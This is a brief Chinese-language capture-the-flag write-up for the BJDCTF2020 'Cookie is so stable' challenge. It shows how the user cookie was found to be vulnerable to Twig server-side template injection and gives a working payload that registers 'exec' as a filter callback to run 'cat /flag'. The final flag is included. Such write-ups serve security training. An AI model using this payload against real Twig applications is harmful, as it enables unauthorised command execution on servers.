[BJDCTF2020]Cookie is so stable

https://github.com/BjdsecCA/BJDCTF2020

 

打开网页,在hint里获得提示让观察cookie

在flag里面的输入框输入"aa",在cookie里发现了user变为"aa"

输入框中输入"{{7*'7'}}",返回49,说明是Twig

于是在user里输入"{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}"得到flag:

flag{48315c84-e112-4ed3-beb9-96a97194a396}

posted @ 2020-12-10 00:27  hktk1643  阅读(207)  评论(0编辑  收藏  举报